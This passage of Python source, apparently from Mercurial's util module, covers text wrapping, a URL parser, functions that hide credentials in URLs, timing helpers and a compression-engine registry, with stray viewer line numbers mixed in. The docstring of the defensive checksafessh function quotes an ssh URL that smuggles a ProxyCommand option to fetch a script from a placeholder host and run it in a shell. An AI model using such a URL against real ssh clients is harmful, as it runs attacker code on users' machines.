    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2394
2394
def uirepr(s):
    """repr() suitable for ui output.

    Collapses the doubled backslashes repr() produces, which would
    otherwise make Windows paths unreadable.
    """
    return repr(s).replace('\\\\', '\\')
2398
2398
# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # split ucstr at the last character that still fits within
            # space_left display columns
            cols = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                cols += colwidth(ucstr[i])
                if space_left < cols:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    chunkcols = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + chunkcols <= width:
                        cur_line.append(chunks.pop())
                        cur_len += chunkcols

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # cache the class so subsequent calls skip the class creation
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2502
2502
def wrap(line, width, initindent='', hangindent=''):
    """Word-wrap line to width display columns, width-awarely.

    initindent prefixes the first output line, hangindent every
    subsequent one.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    # decode once; MBTextWrapper works on unicode for column accounting
    enc = pycompat.sysstr(encoding.encoding)
    encmode = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(enc, encmode)
    initindent = initindent.decode(enc, encmode)
    hangindent = hangindent.decode(enc, encmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(enc)
2518
2518
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #             | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    parts = line.splitlines(True)
                    line = ''
                    for part in parts:
                        if part[-1] == '\n':
                            yield part
                        else:
                            # keep the unterminated tail for the next read
                            line = part
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        # regular on-disk files are immune to EINTR; only wrap the rest
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2590
2590
def iterlines(iterator):
    """Yield every line of every chunk produced by iterator."""
    for block in iterator:
        for line in block.splitlines():
            yield line
2595
2595
def expandpath(path):
    """Expand both environment variables and ~user constructs in path."""
    return os.path.expanduser(os.path.expandvars(path))
2598
2598
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2613
2613
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # reap the child and record its (pid, status) so the polling
        # loop below can notice it exited
        terminated.add(os.wait())
    prevhandler = None
    # SIGCHLD does not exist on Windows; install the handler only on Unix
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # re-check condfn() after detecting the child's death to
            # close the race where it succeeds just before exiting
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # always restore the previous SIGCHLD handler
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2648
2648
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # work on a copy so the caller's mapping is not mutated by the
        # escape entry we add here
        mapping = mapping.copy()
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2673
2673
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not numeric: treat it as a service name
        try:
            return socket.getservbyname(port)
        except socket.error:
            raise Abort(_("no port number associated with service '%s'")
                        % port)
2690
2690
# canonical spellings accepted for boolean configuration values
_booleans = {k: True for k in ('1', 'yes', 'true', 'on', 'always')}
_booleans.update({k: False for k in ('0', 'no', 'false', 'off', 'never')})

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    return _booleans.get(s.lower())
2701
2701
2702 _hextochr = dict((a + b, chr(int(a + b, 16)))
2702 _hextochr = dict((a + b, chr(int(a + b, 16)))
2703 for a in string.hexdigits for b in string.hexdigits)
2703 for a in string.hexdigits for b in string.hexdigits)
2704
2704
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    # matches a leading scheme like 'http:' (alphanumerics plus '+', '.', '-')
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        # keep the untouched input so localpath() can return it verbatim
        # for non-file, non-bundle schemes
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and '?' in path:
            path, self.query = path.split('?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith('//'):
            parts = path[2:].split('/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
                # path of file:///d is /d
                # path of file:///d:/ is d:/, not /d:/
                if path and not hasdriveletter(path):
                    path = '/' + path

        if self.host and '@' in self.host:
            self.user, self.host = self.host.rsplit('@', 1)
            if ':' in self.user:
                self.user, self.passwd = self.user.split(':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (self.host and ':' in self.host and
            not (self.host.startswith('[') and self.host.endswith(']'))):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(':', 1)
            if not self.host:
                self.host = None

        if (self.host and self.scheme == 'file' and
            self.host not in ('localhost', '127.0.0.1', '[::1]')):
            raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
            if self.port:
                s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        # temporarily blank out the credentials so bytes(self) renders a
        # URL without them, then restore the original values
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
3008
3008
def hasscheme(path):
    """Tell whether path carries an explicit URL scheme (e.g. 'http:')."""
    u = url(path)
    return bool(u.scheme)
3011
3011
def hasdriveletter(path):
    """Tell whether path starts with a Windows drive letter ('c:', ...).

    Always returns a bool; the previous form returned the falsy path
    itself ('' or None) for empty input, leaking an inconsistent type
    to callers that only ever use the result in boolean context.
    """
    return bool(path) and path[1:2] == ':' and path[0:1].isalpha()
3014
3014
def urllocalpath(path):
    """Return the local filesystem path for a path or URL string."""
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
3017
3017
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    # a '-' right after the scheme would be handed to ssh as an option
    # instead of a host name
    if path.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
3032
3032
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        # mask rather than drop, so the URL shape stays recognizable
        parsed.passwd = '***'
    return bytes(parsed)
3039
3039
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # return bytes like the sibling hidepassword() does; on Python 2
    # str and bytes are the same type, so this is behavior-preserving
    return bytes(u)
3045
3045
# render a duration (in seconds) with the unit and precision best suited
# to its magnitude; each entry is (threshold, divisor, format string)
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3061
3061
# shared mutable nesting depth so nested @timed calls indent their output
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        step = 2
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            # report even when func raises, and always unwind the depth
            duration = timer() - start
            _timenesting[0] -= step
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(duration)))
    return wrapper
3088
3088
# (suffix, multiplier) pairs; compound suffixes ('kb', ...) must come
# before the bare 'b' so endswith() matches them first
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if t.endswith(suffix):
                return int(float(t[:-len(suffix)]) * multiplier)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3110
3110
class hooks(object):
    '''An ordered collection of hook functions used to extend a
    function's behavior.

    Hooks are invoked in lexicographic order of the source names they
    were registered under.'''

    def __init__(self):
        # list of (source, hook) pairs; kept unsorted until invocation
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # sort in place so hooks registered after a previous call are
        # still ordered correctly
        self._hooks.sort(key=lambda entry: entry[0])
        return [hook(*args) for source, hook in self._hooks]
3128
3128
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yield lines for a nicely formatted stacktrace.

    Skips the 'skip' last entries, then returns the last 'depth' entries
    (depth=0 means all of them).
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields tuples of:
        length of longest filepath+line number,
        filepath+linenumber,
        function

    Not to be used in production code but very convenient while developing.
    '''
    # drop the innermost 'skip' frames plus this generator's own frame
    stack = traceback.extract_stack()[:-skip - 1]
    entries = [(fileline % (filename, lineno), funcname)
               for filename, lineno, funcname, _text in stack][-depth:]
    if not entries:
        return
    width = max(len(location) for location, _funcname in entries)
    for location, funcname in entries:
        if line is None:
            yield (width, location, funcname)
        else:
            yield line % (width, location, funcname)
3151
3151
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Write a message to f (stderr) followed by a nicely formatted
    stacktrace.

    Skips the 'skip' entries closest to the call, then shows at most
    'depth' entries. By default stdout is flushed first so the trace does
    not interleave with pending output.
    Usable everywhere; intentionally does not require a ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 also hides this helper's own frame from the trace
    for entry in getstackframes(skip + 1, depth=depth):
        f.write(entry)
    f.flush()
3166
3166
class dirs(object):
    '''a multiset of directory names, built from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> number of tracked entries living under it
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style mapping: honour the 'skip' state filter
            for filename, entry in map.iteritems():
                if entry[0] != skip:
                    addpath(filename)
        else:
            for filename in map:
                addpath(filename)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # once a directory is already known, every shallower
                # ancestor has been counted too -- stop early
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            remaining = counts[base] - 1
            if remaining:
                # ancestors still referenced elsewhere keep their counts
                counts[base] = remaining
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3202
3202
# Prefer the C implementation of 'dirs' from the parsers module when it is
# available; it is a drop-in replacement for the pure-Python class above.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3205
3205
def finddirs(path):
    '''Yield every ancestor directory of path, deepest first.

    'a/b/c' yields 'a/b' then 'a'; a path with no '/' yields nothing.
    '''
    sep = path.rfind('/')
    while sep >= 0:
        yield path[:sep]
        sep = path.rfind('/', 0, sep)
3211
3211
# compression code

# Roles used when querying wire-protocol compression priorities.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire-protocol support: its format name plus an
# advertisement priority for each role (non-positive priorities are not
# advertised -- see compressormanager.supportedwireengines).
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3220
3220
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Aborts if the engine name or any of its bundle, wire protocol or
        revlog identifiers collides with an already-registered engine.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def _loadedengine(self, name):
        """Return the engine registered under internal ``name``, aborting
        if the engine is known but cannot actually be loaded (e.g. an
        optional C extension is missing)."""
        engine = self._engines[name]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._loadedengine(self._bundlenames[bundlename])

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._loadedengine(self._bundletypes[bundletype])

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire protocol
        identifier.

        Will raise KeyError if the wire type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._loadedengine(self._wiretypes[wiretype])

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]
3374
3374
# Global registry instance; the engines defined below register themselves
# against it at import time.
compengines = compressormanager()
3376
3376
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    # name(), compressstream(), decompressorreader() and revlogcompressor()
    # are abstract; available(), bundletype(), wireprotosupport() and
    # revlogheader() provide "always available" / "not supported" defaults
    # that subclasses override as appropriate.

    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader`.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
